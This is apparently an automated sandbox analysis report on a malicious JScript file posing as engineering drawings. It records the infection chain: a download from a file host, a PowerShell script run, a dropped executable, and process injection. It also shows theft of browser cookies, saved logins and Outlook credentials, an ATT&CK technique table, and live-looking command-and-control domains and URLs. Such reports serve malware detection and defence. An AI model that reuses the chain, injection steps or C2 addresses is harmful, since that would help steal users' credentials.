                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00F57505 mov ecx, dword ptr fs:[00000030h]4_2_00F57505
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FF4500 mov eax, dword ptr fs:[00000030h]4_2_00FF4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FF4500 mov eax, dword ptr fs:[00000030h]4_2_00FF4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FF4500 mov eax, dword ptr fs:[00000030h]4_2_00FF4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FF4500 mov eax, dword ptr fs:[00000030h]4_2_00FF4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FF4500 mov eax, dword ptr fs:[00000030h]4_2_00FF4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FF4500 mov eax, dword ptr fs:[00000030h]4_2_00FF4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00FF4500 mov eax, dword ptr fs:[00000030h]4_2_00FF4500
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\System32\wscript.exeNetwork Connect: 108.181.20.35 443Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: NULL target: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeSection loaded: NULL target: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: NULL target: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: NULL target: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeThread register set: target process: 7124Jump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeThread APC queued: target process: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 628008Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\downloaded_script.ps1"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exeProcess created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: xBjKgBCuI1jq.exe, 00000008.00000000.2132826784.0000000001480000.00000002.00000001.00040000.00000000.sdmp, xBjKgBCuI1jq.exe, 00000008.00000002.2975154451.0000000001480000.00000002.00000001.00040000.00000000.sdmp, xBjKgBCuI1jq.exe, 0000000A.00000000.2282081923.0000000001470000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: xBjKgBCuI1jq.exe, 00000008.00000000.2132826784.0000000001480000.00000002.00000001.00040000.00000000.sdmp, xBjKgBCuI1jq.exe, 00000008.00000002.2975154451.0000000001480000.00000002.00000001.00040000.00000000.sdmp, xBjKgBCuI1jq.exe, 0000000A.00000000.2282081923.0000000001470000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: xBjKgBCuI1jq.exe, 00000008.00000000.2132826784.0000000001480000.00000002.00000001.00040000.00000000.sdmp, xBjKgBCuI1jq.exe, 00000008.00000002.2975154451.0000000001480000.00000002.00000001.00040000.00000000.sdmp, xBjKgBCuI1jq.exe, 0000000A.00000000.2282081923.0000000001470000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: xBjKgBCuI1jq.exe, 00000008.00000000.2132826784.0000000001480000.00000002.00000001.00040000.00000000.sdmp, xBjKgBCuI1jq.exe, 00000008.00000002.2975154451.0000000001480000.00000002.00000001.00040000.00000000.sdmp, xBjKgBCuI1jq.exe, 0000000A.00000000.2282081923.0000000001470000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeQueries volume information: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe VolumeInformationJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.2975519178.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2212915284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2974122884.0000000002600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2975394799.0000000002940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2975585559.0000000004310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2975527650.0000000003570000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2217495881.0000000001290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2217981667.0000000001D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\runonce.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.2975519178.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2212915284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2974122884.0000000002600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2975394799.0000000002940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2975585559.0000000004310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2975527650.0000000003570000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2217495881.0000000001290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2217981667.0000000001D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information42
                Scripting
                Valid Accounts1
                Exploitation for Client Execution
                42
                Scripting
                1
                Abuse Elevation Control Mechanism
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                File and Directory Discovery
                Remote Services11
                Archive Collected Data
                3
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                PowerShell
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                11
                Deobfuscate/Decode Files or Information
                LSASS Memory113
                System Information Discovery
                Remote Desktop Protocol1
                Data from Local System
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)712
                Process Injection
                1
                Abuse Elevation Control Mechanism
                Security Account Manager121
                Security Software Discovery
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook5
                Obfuscated Files or Information
                NTDS2
                Process Discovery
                Distributed Component Object ModelInput Capture5
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script22
                Software Packing
                LSA Secrets41
                Virtualization/Sandbox Evasion
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Masquerading
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
                Virtualization/Sandbox Evasion
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt712
                Process Injection
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1623349 Sample: Stormwater Works Drawings Spec.js Startdate: 25/02/2025 Architecture: WINDOWS Score: 100 43 www.seasay.xyz 2->43 45 www.l63339.xyz 2->45 47 5 other IPs or domains 2->47 65 Suricata IDS alerts for network traffic 2->65 67 Malicious sample detected (through community Yara rule) 2->67 69 Antivirus detection for URL or domain 2->69 73 8 other signatures 2->73 11 wscript.exe 1 16 2->11         started        signatures3 71 Performs DNS queries to domains with low reputation 45->71 process4 dnsIp5 55 files.catbox.moe 108.181.20.35, 443, 49731 ASN852CA Canada 11->55 41 C:\Temp\downloaded_script.ps1, ASCII 11->41 dropped 93 System process connects to network (likely due to code injection or exploit) 11->93 95 JScript performs obfuscated calls to suspicious functions 11->95 97 Wscript starts Powershell (via cmd or directly) 11->97 99 2 other signatures 11->99 16 powershell.exe 13 11->16         started        file6 signatures7 process8 file9 39 C:\Users\...\JXCJKXCJHKJHXCJHKXCXCJHK.exe, PE32 16->39 dropped 57 Found suspicious powershell code related to unpacking or dynamic code loading 16->57 59 Powershell drops PE file 16->59 20 JXCJKXCJHKJHXCJHKXCXCJHK.exe 3 16->20         started        23 xBjKgBCuI1jq.exe 16->23 injected 26 conhost.exe 16->26         started        28 firefox.exe 16->28         started        signatures10 process11 dnsIp12 75 Antivirus detection for dropped file 20->75 77 Writes to foreign memory regions 20->77 79 Allocates memory in foreign processes 20->79 81 Injects a PE file into a foreign processes 20->81 30 aspnet_compiler.exe 20->30         started        49 www.seasay.xyz 103.106.67.112, 49899, 49919, 49935 VOYAGERNET-AS-APVoyagerInternetLtdNZ New Zealand 23->49 51 www.tumbetgirislinki.fit 104.21.32.1, 49987, 50007, 50011 CLOUDFLARENETUS United States 23->51 53 3 other IPs or domains 23->53 83 Found direct / indirect Syscall (likely to bypass EDR) 23->83 signatures13 process14 signatures15 101 Maps a DLL or memory area into another process 30->101 33 xBjKgBCuI1jq.exe 30->33 injected process16 signatures17 61 Maps a DLL or memory area into another process 33->61 63 Found direct / indirect Syscall (likely to bypass EDR) 33->63 36 runonce.exe 13 33->36         started        process18 signatures19 85 Tries to steal Mail credentials (via file / registry access) 36->85 87 Tries to harvest and steal browser information (history, passwords, etc) 36->87 89 Modifies the context of a thread in another process (thread injection) 36->89 91 3 other signatures 36->91

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Stormwater Works Drawings Spec.js8%ReversingLabsWin32.Adware.Generic
                Stormwater Works Drawings Spec.js13%VirustotalBrowse
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe100%AviraTR/Dropper.Gen
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://files.ca0%Avira URL Cloudsafe
                http://www.tumbetgirislinki.fit/k566/?CL=RARW43WNMKajmHobqktuR6SSs++r69WXvXreCHJ6fEp5jkldk9mcWmm/U2k918FOdcoJ/x5nnQwLxIae2MHe/M4SnSZZuBmldonFkNjvznFjfMe0yaUlTKw=&Cf=xxUlW2vX-dIPmnP0100%Avira URL Cloudphishing
                https://www.seasay.xyz/c9ts/?CL=b2h4705j/BXuiRKuOXJLA/Ych4100%Avira URL Cloudmalware
                http://www.seasay.xyz/c9ts/?CL=b2h4705j/BXuiRKuOXJLA/Ych4+2MinMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAyaJnRUVMUOnSQnGJ4mxt7RzM6wNjAHWVIo4recboKbaao8YnR4NtOnxQ=&Cf=xxUlW2vX-dIPmnP0100%Avira URL Cloudmalware
